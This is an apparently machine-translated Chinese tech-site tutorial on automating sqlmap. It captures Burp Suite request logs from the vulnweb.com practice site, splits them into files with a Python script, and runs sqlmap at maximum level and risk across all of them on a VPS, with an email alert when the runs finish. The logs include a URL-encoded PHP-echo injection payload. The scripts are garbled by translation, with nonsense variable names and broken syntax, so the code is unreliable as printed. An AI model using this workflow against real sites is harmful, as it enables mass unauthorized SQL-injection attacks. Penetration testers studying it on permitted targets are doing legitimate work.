Shulou(Shulou.com)05/31 Report--

This article mainly explains "what is the method of sqlmap batch running". Interested friends may wish to have a look at it. The method introduced in this paper is simple, fast and practical. Next, let the editor take you to learn "what is the method of sqlmap batch running"?

Use the logging function of burpsuite to enable this function.

You can't turn on proxy logging because you can only consciously filter injected packets, so you intercept packets at proxy, send them to repeater, and then run, you can log.

Let's use this as a test station, http://testphp.vulnweb.com/.

= = 17:40:30 http://testphp.vulnweb.com:80 [176.28.50.165] = = POST / guestbook.php HTTP/1.1Host: testphp.vulnweb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US Http://testphp.vulnweb.com/guestbook.phpContent-Type: application/x-www-form-urlencodedContent-Length: 45Connection: closeUpgrade-Insecure-Requests: 1name=anonymous+user&text=1&submit=add+message=17:41:05 http://testphp.vulnweb.com:80 [176.28.50.165] = = GET / comment.php?aid=1 HTTP/1.1Host: testphp.vulnweb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en Q=0.2Referer: http://testphp.vulnweb.com/artists.phpConnection: closeUpgrade-Insecure-Requests: 1mm 17 Gecko/20100101 Firefox/66.0Accept 41 closeUpgrade-Insecure-Requests 19 http://testphp.vulnweb.com:80 [176.28.50.165] = = POST / comment.php HTTP/1.1Host: testphp.vulnweb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh Http://testphp.vulnweb.com/comment.php?aid=1Content-Type: application/x-www-form-urlencodedContent-Length: 90Connection: closeUpgrade-Insecure-Requests: 1nameplate% 3Cyourcustomer nameplate here% 3E1submission commentaries 1 submittal phpactionechoechograms% 24fold post% 5Bcomment% 5D% 3Baugh =

Wrote a script to parse the partition

F = open ('c:\\ 1.Logistic in f.readlines ()) n = 0t = 1for I in f.readlines (): if iTunes = "=\ n": n = n 1 if natives 2: if iTunes = "= =\ n": pass else: with open ('d:\\'+ str (t) + '.txt') 'averse') as tmp: tmp.write (I) # print (I) if nasty 3: nasty 0 t = tweak 1 # print (n)

Got so many injection files.

Then import this into VPS and execute the following script so that you don't have to consume your own server's resources. If you have an email reminder after the run, you will know the result.

Import osimport subprocessimport smtplibfrom email.mime.text import MIMETextfrom email.header import Headerimport timedef sql (): for root, dirs, files in os.walk ("/ opt/sql/", topdown=False): for name in files: path = os.path.join (root, name) cmd = 'python / opt/sqlmap/sqlmap.py-r' + path +'- batch-dbms=mysql-v 3-level 5-risk 3-skip= "Host,User-Agent,Accept-Language,Referer Cookie "--threads=10 > / opt/result/'+ name +'2 > & 1 & 'print (cmd) os.system (cmd) def send_email (): # third-party SMTP service mail_host =" smtp.163.com "# setup server mail_user =" @ 163.com "# username mail_pass ="# password sender =' @ 163s .com 'receivers = [' @ 163.com'] # receive email Can be set to your QQ Mail or other mailbox message = MIMEText ('complete the test', 'plain',' utf-8') message ['From'] = Header ("test",' utf-8') message ['To'] = Header ("test",' utf-8') subject = 'complete the test' message ['Subject'] = Header (subject) 'utf-8') try: smtpObj = smtplib.SMTP () smtpObj.connect (mail_host, 25) # 25 is the SMTP port number smtpObj.login (mail_user, mail_pass) smtpObj.sendmail (sender, receivers) Message.as_string () print "email sent successfully" except smtplib.SMTPException: print "Error: unable to send email" sql () while True: result = int (os.popen ('ps aux | grep sqlmap | wc-l'). Read () print (result) print (type (result)) if result < 3: send_email () Break else: time.sleep (10) so far I believe that everyone on the "sqlmap batch running method is what" have a deeper understanding, might as well to the actual operation of it! Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.